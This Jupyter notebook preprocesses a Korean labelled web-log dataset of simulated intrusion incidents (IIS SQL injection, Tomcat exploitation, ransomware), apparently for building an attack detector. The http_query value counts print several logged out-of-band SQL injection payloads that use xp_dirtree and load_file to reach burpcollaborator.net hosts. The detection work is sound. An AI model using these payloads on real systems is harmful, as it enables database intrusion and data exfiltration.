In [12]:
!pip3 install pandas openpyxl tqdm pandas-profiling

Requirement already satisfied: pandas in /usr/local/lib/python3.8/dist-packages (2.0.1)
Requirement already satisfied: openpyxl in /usr/local/lib/python3.8/dist-packages (3.1.2)
Requirement already satisfied: tqdm in /usr/local/lib/python3.8/dist-packages (4.65.0)
Requirement already satisfied: pytz>=2020.1 in /usr/local/lib/python3.8/dist-packages (from pandas) (2023.3)
Requirement already satisfied: numpy>=1.20.3; python_version < "3.10" in /usr/local/lib/python3.8/dist-packages (from pandas) (1.23.4)
Requirement already satisfied: python-dateutil>=2.8.2 in /usr/local/lib/python3.8/dist-packages (from pandas) (2.8.2)
Requirement already satisfied: tzdata>=2022.1 in /usr/local/lib/python3.8/dist-packages (from pandas) (2023.3)
Requirement already satisfied: et-xmlfile in /usr/local/lib/python3.8/dist-packages (from openpyxl) (1.1.0)
Requirement already satisfied: six>=1.5 in /usr/lib/python3/dist-packages (from python-dateutil>=2.8.2->pandas) (1.14.0)
WARNING: You are using pip version 20.2.4; however, version 23.1.2 is available.
You should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.
Requirement already up-to-date: pandas-profiling in /usr/local/lib/python3.8/dist-packages (3.6.6)
Requirement already satisfied, skipping upgrade: ydata-profiling in /usr/local/lib/python3.8/dist-packages (from pandas-profiling) (4.1.2)
Requirement already satisfied, skipping upgrade: seaborn<0.13,>=0.10.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (0.12.2)
Requirement already satisfied, skipping upgrade: phik<0.13,>=0.11.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (0.12.3)
Requirement already satisfied, skipping upgrade: multimethod<1.10,>=1.4 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (1.9.1)
Requirement already satisfied, skipping upgrade: scipy<1.10,>=1.4.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (1.9.3)
Requirement already satisfied, skipping upgrade: PyYAML<6.1,>=5.0.0 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (6.0)
Requirement already satisfied, skipping upgrade: matplotlib<3.7,>=3.2 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (3.6.2)
Collecting tqdm<4.65,>=4.48.2
  Downloading tqdm-4.64.1-py2.py3-none-any.whl (78 kB)
     |████████████████████████████████| 78 kB 5.5 MB/s eta 0:00:011
Requirement already satisfied, skipping upgrade: numpy<1.24,>=1.16.0 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (1.23.4)
Requirement already satisfied, skipping upgrade: visions[type_image_path]==0.7.5 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (0.7.5)
Requirement already satisfied, skipping upgrade: statsmodels<0.14,>=0.13.2 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (0.13.5)
Requirement already satisfied, skipping upgrade: imagehash==4.3.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (4.3.1)
Requirement already satisfied, skipping upgrade: jinja2<3.2,>=2.11.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (3.1.2)
Requirement already satisfied, skipping upgrade: typeguard<2.14,>=2.13.2 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (2.13.3)
Requirement already satisfied, skipping upgrade: htmlmin==0.1.12 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (0.1.12)
Collecting pandas!=1.4.0,<1.6,>1.1
  Downloading pandas-1.5.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (12.2 MB)
     |████████████████████████████████| 12.2 MB 34.4 MB/s eta 0:00:01
Requirement already satisfied, skipping upgrade: pydantic<1.11,>=1.8.1 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (1.10.7)
Requirement already satisfied, skipping upgrade: requests<2.29,>=2.24.0 in /usr/local/lib/python3.8/dist-packages (from ydata-profiling->pandas-profiling) (2.28.2)
Requirement already satisfied, skipping upgrade: joblib>=0.14.1 in /usr/local/lib/python3.8/dist-packages (from phik<0.13,>=0.11.1->ydata-profiling->pandas-profiling) (1.2.0)
Requirement already satisfied, skipping upgrade: pyparsing>=2.2.1 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (3.0.9)
Requirement already satisfied, skipping upgrade: fonttools>=4.22.0 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (4.38.0)
Requirement already satisfied, skipping upgrade: packaging>=20.0 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (21.3)
Requirement already satisfied, skipping upgrade: python-dateutil>=2.7 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (2.8.2)
Requirement already satisfied, skipping upgrade: pillow>=6.2.0 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (9.3.0)
Requirement already satisfied, skipping upgrade: cycler>=0.10 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (0.11.0)
Requirement already satisfied, skipping upgrade: contourpy>=1.0.1 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (1.0.6)
Requirement already satisfied, skipping upgrade: kiwisolver>=1.0.1 in /usr/local/lib/python3.8/dist-packages (from matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (1.4.4)
Requirement already satisfied, skipping upgrade: attrs>=19.3.0 in /usr/local/lib/python3.8/dist-packages (from visions[type_image_path]==0.7.5->ydata-profiling->pandas-profiling) (22.1.0)
Requirement already satisfied, skipping upgrade: tangled-up-in-unicode>=0.0.4 in /usr/local/lib/python3.8/dist-packages (from visions[type_image_path]==0.7.5->ydata-profiling->pandas-profiling) (0.2.0)
Requirement already satisfied, skipping upgrade: networkx>=2.4 in /usr/local/lib/python3.8/dist-packages (from visions[type_image_path]==0.7.5->ydata-profiling->pandas-profiling) (3.1)
Requirement already satisfied, skipping upgrade: patsy>=0.5.2 in /usr/local/lib/python3.8/dist-packages (from statsmodels<0.14,>=0.13.2->ydata-profiling->pandas-profiling) (0.5.3)
Requirement already satisfied, skipping upgrade: PyWavelets in /usr/local/lib/python3.8/dist-packages (from imagehash==4.3.1->ydata-profiling->pandas-profiling) (1.4.1)
Requirement already satisfied, skipping upgrade: MarkupSafe>=2.0 in /usr/local/lib/python3.8/dist-packages (from jinja2<3.2,>=2.11.1->ydata-profiling->pandas-profiling) (2.1.1)
Requirement already satisfied, skipping upgrade: pytz>=2020.1 in /usr/local/lib/python3.8/dist-packages (from pandas!=1.4.0,<1.6,>1.1->ydata-profiling->pandas-profiling) (2023.3)
Requirement already satisfied, skipping upgrade: typing-extensions>=4.2.0 in /usr/local/lib/python3.8/dist-packages (from pydantic<1.11,>=1.8.1->ydata-profiling->pandas-profiling) (4.4.0)
Requirement already satisfied, skipping upgrade: charset-normalizer<4,>=2 in /usr/local/lib/python3.8/dist-packages (from requests<2.29,>=2.24.0->ydata-profiling->pandas-profiling) (3.1.0)
Requirement already satisfied, skipping upgrade: idna<4,>=2.5 in /usr/lib/python3/dist-packages (from requests<2.29,>=2.24.0->ydata-profiling->pandas-profiling) (2.8)
Requirement already satisfied, skipping upgrade: urllib3<1.27,>=1.21.1 in /usr/lib/python3/dist-packages (from requests<2.29,>=2.24.0->ydata-profiling->pandas-profiling) (1.25.8)
Requirement already satisfied, skipping upgrade: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests<2.29,>=2.24.0->ydata-profiling->pandas-profiling) (2019.11.28)
Requirement already satisfied, skipping upgrade: six>=1.5 in /usr/lib/python3/dist-packages (from python-dateutil>=2.7->matplotlib<3.7,>=3.2->ydata-profiling->pandas-profiling) (1.14.0)
Installing collected packages: tqdm, pandas
  Attempting uninstall: tqdm
    Found existing installation: tqdm 4.65.0
    Uninstalling tqdm-4.65.0:
      Successfully uninstalled tqdm-4.65.0

  Attempting uninstall: pandas
    Found existing installation: pandas 2.0.1
    Uninstalling pandas-2.0.1:
      Successfully uninstalled pandas-2.0.1
Successfully installed pandas-1.5.3 tqdm-4.64.1
WARNING: You are using pip version 20.2.4; however, version 23.1.2 is available.
You should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.

# Import and PATH setting

In [1]:
import pandas as pd
import pandas_profiling
from glob import glob
from tqdm import tqdm

<ipython-input-1-88ed54c92eb7>:2: DeprecationWarning: `import pandas_profiling` is going to be deprecated by April 1st. Please use `import ydata_profiling` instead.
  import pandas_profiling

In [2]:
DATAPATH = "./dataset"

# Preprocessing

## Excel Load

In [3]:
excels_path = glob(f"{DATAPATH}/*/*LBL*")
excels_path

['./dataset/WEB.Teamviewer.이용.업데이트.서버.해킹사고/3-09-WEB_IIS-LBL.xlsx',
 './dataset/WEB.홈페이지를.통한.내부망.장악/3-01-WEB_IIS-LBL.xlsx',
 './dataset/WEB.Apache.WAS(Tomcat).취약점.악용.권한.탈취.사고/3-14-WEB_Apache-LBL.xlsx',
 './dataset/WEB.IIS.SQL.Injection.취약점.악용.데이터.유출.사고/3-13-WEB_IIS-LBL.xlsx',
 './dataset/WEB.유닉스.취약점.악용.및.랜섬웨어.감염/3-02-WEB_Apache-LBL.xlsx']

In [4]:
web_df = pd.DataFrame()

for excel_path in tqdm(excels_path):
    df = pd.read_excel(excel_path, engine='openpyxl')
    web_df = pd.concat([web_df, df])

100%|██████████| 5/5 [00:07<00:00,  1.41s/it]

In [5]:
web_df.head()

,rn,event_time,s_ip,s_port,s_country,d_ip,d_port,d_country,direction,http_method,...,pkt_bytes,rcvd_bytes,referer,sent_bytes,user_agent,label_attack,label_mitre,label_scenario,Unnamed: 20,Unnamed: 21
0,1,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,480.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,NaN,NaN
1,2,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,480.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,NaN,NaN
2,3,10/28/21 2:27,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5549,423.0,http://218.49.112.115/Client.txt,5549.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,NaN,NaN
3,4,10/28/21 2:28,10.0.0.1,0,KR,172.16.1.60,80,-,3,GET,...,5547,506.0,-,5547.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,attack,T1204.002,-,NaN,NaN
4,5,10/29/21 5:30,172.16.1.72,0,-,172.16.1.60,80,-,1,GET,...,5546,267.0,-,5546.0,Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Appl...,normal,-,-,NaN,NaN

In [6]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
Int64Index: 40182 entries, 0 to 543
Data columns (total 24 columns):
 #   Column          Non-Null Count  Dtype
---  ------          --------------  -----
 0   rn              40182 non-null  int64
 1   event_time      40182 non-null  object
 2   s_ip            40182 non-null  object
 3   s_port          40182 non-null  int64
 4   s_country       40182 non-null  object
 5   d_ip            40182 non-null  object
 6   d_port          40182 non-null  int64
 7   d_country       40182 non-null  object
 8   direction       40182 non-null  int64
 9   http_method     40182 non-null  object
 10  http_query      23626 non-null  object
 11  http_version    40182 non-null  object
 12  http_url        40182 non-null  object
 13  http_status     40182 non-null  int64
 14  pkt_bytes       40182 non-null  int64
 15  rcvd_bytes      2318 non-null   float64
 16  referer         40182 non-null  object
 17  sent_bytes      13444 non-null  float64
 18  user_agent      40182 non-null  object
 19  label_attack    40182 non-null  object
 20  label_mitre     40182 non-null  object
 21  label_scenario  40182 non-null  object
 22  Unnamed: 20     0 non-null      float64
 23  Unnamed: 21     1 non-null      object
dtypes: float64(3), int64(6), object(15)
memory usage: 7.7+ MB

In [7]:
web_df = web_df.reset_index()

## 필요없는 열 삭제

In [8]:
web_df.isnull().sum()

index                 0
rn                    0
event_time            0
s_ip                  0
s_port                0
s_country             0
d_ip                  0
d_port                0
d_country             0
direction             0
http_method           0
http_query        16556
http_version          0
http_url              0
http_status           0
pkt_bytes             0
rcvd_bytes        37864
referer               0
sent_bytes        26738
user_agent            0
label_attack          0
label_mitre           0
label_scenario        0
Unnamed: 20       40182
Unnamed: 21       40181
dtype: int64

In [9]:
web_df.drop(['rn', 'event_time', 's_ip', 's_port', 's_country', 'd_ip', 'd_port',
             'd_country', 'user_agent', 'label_mitre', 'label_scenario',
             'Unnamed: 20','Unnamed: 21'], axis=1, inplace=True)

In [10]:
web_df.head()

,index,direction,http_method,http_query,http_version,http_url,http_status,pkt_bytes,rcvd_bytes,referer,sent_bytes,label_attack
0,0,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480.0,-,5547.0,attack
1,1,3,GET,-,HTTP/1.1,/Client.txt,404,5547,480.0,-,5547.0,attack
2,2,3,GET,-,HTTP/1.1,/favicon.ico,404,5549,423.0,http://218.49.112.115/Client.txt,5549.0,attack
3,3,3,GET,-,HTTP/1.1,/Client.txt,404,5547,506.0,-,5547.0,attack
4,4,1,GET,-,HTTP/1.1,/favicon.ico,404,5546,267.0,-,5546.0,normal

In [11]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 40182 entries, 0 to 40181
Data columns (total 12 columns):
 #   Column        Non-Null Count  Dtype
---  ------        --------------  -----
 0   index         40182 non-null  int64
 1   direction     40182 non-null  int64
 2   http_method   40182 non-null  object
 3   http_query    23626 non-null  object
 4   http_version  40182 non-null  object
 5   http_url      40182 non-null  object
 6   http_status   40182 non-null  int64
 7   pkt_bytes     40182 non-null  int64
 8   rcvd_bytes    2318 non-null   float64
 9   referer       40182 non-null  object
 10  sent_bytes    13444 non-null  float64
 11  label_attack  40182 non-null  object
dtypes: float64(2), int64(4), object(6)
memory usage: 3.7+ MB

## null 값 대체

### http_query

In [12]:
web_df["http_query"].value_counts()

-                                                                                                                                                                                                                                       12263
?org.apache.catalina.filters.CSRF_NONCE=2DB51B70DF17EEE27863DBC19BBBA14A                                                                                                                                                                10044
page=1&v_num=111                                                                                                                                                                                                                          400
full=true                                                                                                                                                                                                                                  22
?part=index&rid=20&bid=notice,talkbox&tid=5&tag=y&hl=0&tsizl=50&pid=                                                                                                                                                                       20
                                                                                                                                                                                                                                        ...
page=1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cdj0vyucjeyzq3fwfthtn6xahb8h05rxfo2eq3.burpcollab'%2b'orator.net%5curw'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&v_num=111|23|800a000d|������_��ġ����_�ʽ��ϴ�.:_'page'         1
page=1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5ci5o0kzyo03lvpkikfmfss2wmxd35rwkkb71vq.burpcollab'%2b'orator.net%5cvsa'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&v_num=111|23|800a000d|������_��ġ����_�ʽ��ϴ�.:_'page'        1
page=(select%20load_file('%5c%5c%5c%5c5pvn4mibkq5i9727z9zfcpg9h0nsbjd74uuij.burpcollaborator.net%5c%5cbrt'))&v_num=111|23|800a000d|������_��ġ����_�ʽ��ϴ�.:_'page'                                                                           1
page=1'%2b(select%20load_file('%5c%5c%5c%5c6jqoynccerzj38w8tatg6qaab1ht5k88zvpje.burpcollaborator.net%5c%5ccls'))%2b'&v_num=111|23|800a000d|������_��ġ����_�ʽ��ϴ�.:_'page'                                                                  1
?boardId=free&boardNo=162980390089131&command=READ&page=1&categoryId=-1                                                                                                                                                                     1
Name: http_query, Length: 663, dtype: int64

In [13]:
web_df["http_query"] = web_df["http_query"].fillna('-')

In [14]:
web_df["http_query"].isnull().sum()

0

### rcvd_bytes

In [15]:
web_df["rcvd_bytes"].value_counts()

237.0    42
235.0    41
240.0    40
236.0    40
588.0    38
         ..
677.0     1
879.0     1
812.0     1
580.0     1
631.0     1
Name: rcvd_bytes, Length: 410, dtype: int64

In [16]:
web_df["rcvd_bytes"] = web_df["rcvd_bytes"].fillna(0)

In [17]:
web_df["rcvd_bytes"].isnull().sum()

0

### sent_bytes

In [18]:
web_df["sent_bytes"].value_counts()

332.0      10842
521.0        410
30447.0      229
5573.0        73
30446.0       60
           ...
681.0          1
5578.0         1
23604.0        1
5600.0         1
15478.0        1
Name: sent_bytes, Length: 484, dtype: int64

In [19]:
web_df["sent_bytes"] = web_df["sent_bytes"].fillna(0)

In [20]:
web_df["rcvd_bytes"].isnull().sum()

0

## 프로파일링

In [21]:
web_df.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 40182 entries, 0 to 40181
Data columns (total 12 columns):
 #   Column        Non-Null Count  Dtype
---  ------        --------------  -----
 0   index         40182 non-null  int64
 1   direction     40182 non-null  int64
 2   http_method   40182 non-null  object
 3   http_query    40182 non-null  object
 4   http_version  40182 non-null  object
 5   http_url      40182 non-null  object
 6   http_status   40182 non-null  int64
 7   pkt_bytes     40182 non-null  int64
 8   rcvd_bytes    40182 non-null  float64
 9   referer       40182 non-null  object
 10  sent_bytes    40182 non-null  float64
 11  label_attack  40182 non-null  object
dtypes: float64(2), int64(4), object(6)
memory usage: 3.7+ MB